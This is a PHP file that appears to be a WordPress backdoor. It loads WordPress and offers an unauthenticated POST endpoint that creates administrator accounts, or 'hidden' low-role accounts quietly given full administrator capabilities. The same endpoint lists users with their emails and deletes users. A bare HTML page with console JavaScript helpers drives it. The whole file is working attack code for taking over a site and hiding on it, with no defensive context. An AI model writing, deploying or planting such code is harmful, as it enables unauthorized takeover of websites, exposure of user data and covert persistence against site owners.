<?php
$d = dirname(__FILE__);
while ($d !== dirname($d)) {
    if (file_exists($d . '/wp-load.php')) {
        require_once($d . '/wp-load.php');
        break;
    }
    $d = dirname($d);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    header('Content-Type: application/json');
    
    $input = file_get_contents('php://input');
    $data = json_decode($input, true);
    
    if (isset($data['u']) && isset($data['p']) && isset($data['e'])) {
        $names = ['James','John','Robert','Michael','David','William','Richard','Joseph','Thomas','Charles','Mary','Patricia','Jennifer','Linda','Elizabeth','Barbara','Susan','Jessica','Sarah','Karen'];
        $surnames = ['Smith','Johnson','Williams','Brown','Jones','Garcia','Miller','Davis','Rodriguez','Martinez','Wilson','Anderson','Taylor','Thomas','Moore','Jackson','Martin','Lee','Thompson','White'];
        
        $fn = $names[array_rand($names)];
        $ln = $surnames[array_rand($surnames)];
        $hidden = isset($data['hidden']) && $data['hidden'];
        
        $hiddenRole = 'subscriber';
        if ($hidden && get_role('customer')) {
            $hiddenRole = 'customer';
        }
        
        $userdata = [
            'user_login' => $data['u'],
            'user_pass' => $data['p'],
            'user_email' => $data['e'],
            'first_name' => $fn,
            'last_name' => $ln,
            'display_name' => $fn . ' ' . $ln,
            'nickname' => $data['u'],
            'user_nicename' => sanitize_title($data['u']),
            'description' => '',
            'user_url' => '',
            'role' => $hidden ? $hiddenRole : 'administrator'
        ];
        
        $user_id = wp_insert_user($userdata);
        
        if (is_wp_error($user_id)) {
            echo json_encode(['ok' => 0, 'msg' => $user_id->get_error_message()]);
            exit;
        }
        
        if ($hidden) {
            $user = new WP_User($user_id);
            $admin_role = get_role('administrator');
            if ($admin_role) {
                foreach ($admin_role->capabilities as $cap => $granted) {
                    if ($granted) {
                        $user->add_cap($cap);
                    }
                }
            }
        }
        
        update_user_meta($user_id, 'show_admin_bar_front', 'false');
        
        echo json_encode(['ok' => 1, 'id' => $user_id, 'name' => $fn . ' ' . $ln, 'type' => $hidden ? 'hidden' : 'normal']);
        exit;
    }
    
    if (isset($data['list'])) {
        global $wpdb;
        $search = isset($data['search']) ? $data['search'] : '';
        
        if ($search) {
            $sql = $wpdb->prepare(
                "SELECT DISTINCT u.ID, u.user_login, u.user_email, m.meta_value 
                FROM {$wpdb->users} u 
                JOIN {$wpdb->usermeta} m ON u.ID = m.user_id 
                WHERE m.meta_key LIKE %s AND m.meta_value LIKE %s",
                '%capabilities%',
                '%' . $search . '%'
            );
        } else {
            $sql = "SELECT DISTINCT u.ID, u.user_login, u.user_email, m.meta_value 
                FROM {$wpdb->users} u 
                JOIN {$wpdb->usermeta} m ON u.ID = m.user_id 
                WHERE m.meta_key LIKE '%capabilities%'
                LIMIT 100";
        }
        
        $results = $wpdb->get_results($sql, ARRAY_A);
        $list = [];
        foreach ($results as $r) {
            $caps = @unserialize($r['meta_value']);
            $roles = is_array($caps) ? implode(',', array_keys($caps)) : $r['meta_value'];
            $list[] = ['id' => $r['ID'], 'login' => $r['user_login'], 'email' => $r['user_email'], 'roles' => $roles];
        }
        echo json_encode(['ok' => 1, 'users' => $list]);
        exit;
    }
    
    if (isset($data['hidden_check'])) {
        $users = get_users();
        $suspicious = [];
        $admin_caps = ['manage_options','edit_users','install_plugins','activate_plugins','delete_plugins','edit_theme_options','update_core'];
        
        foreach ($users as $u) {
            $user_role = !empty($u->roles) ? $u->roles[0] : 'none';
            
            if (in_array($user_role, ['administrator'])) {
                continue;
            }
            
            $found_caps = [];
            foreach ($admin_caps as $cap) {
                if ($u->has_cap($cap)) {
                    $found_caps[] = $cap;
                }
            }
            
            if (!empty($found_caps)) {
                $suspicious[] = [
                    'id' => $u->ID,
                    'login' => $u->user_login,
                    'role' => $user_role,
                    'caps' => implode(', ', $found_caps)
                ];
            }
        }
        
        echo json_encode(['ok' => 1, 'users' => $suspicious]);
        exit;
    }
    
    if (isset($data['del']) && isset($data['id'])) {
        require_once(ABSPATH . 'wp-admin/includes/user.php');
        $r = wp_delete_user(intval($data['id']));
        echo json_encode(['ok' => $r ? 1 : 0]);
        exit;
    }
    
    echo json_encode(['ok' => 0]);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title></title>
</head>
<body>
<script>
function ca(user,pass,email){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({u:user,p:pass,e:email})
    }).then(r=>r.json()).then(r=>{
        if(r.ok)alert('ID: '+r.id+'\nName: '+r.name);
        else alert(r.msg||'error');
    });
}
function cs(user,pass,email){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({u:user,p:pass,e:email,hidden:1})
    }).then(r=>r.json()).then(r=>{
        if(r.ok)alert('ID: '+r.id+'\nName: '+r.name+'\nType: HIDDEN');
        else alert(r.msg||'error');
    });
}
function la(search){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({list:1,search:search||''})
    }).then(r=>r.json()).then(r=>{
        if(r.ok&&r.users.length>0){
            console.table(r.users);
        }else{
            console.log(r);
        }
    });
}
function da(id){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({del:1,id:id})
    }).then(r=>r.json()).then(r=>{if(r.ok)alert('1');});
}
function lh(){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({hidden_check:1})
    }).then(r=>r.json()).then(r=>{
        if(r.ok&&r.users.length>0){
            console.table(r.users);
        }else{
            console.log('No suspicious users found');
        }
    });
}
</script>
</body>
</html>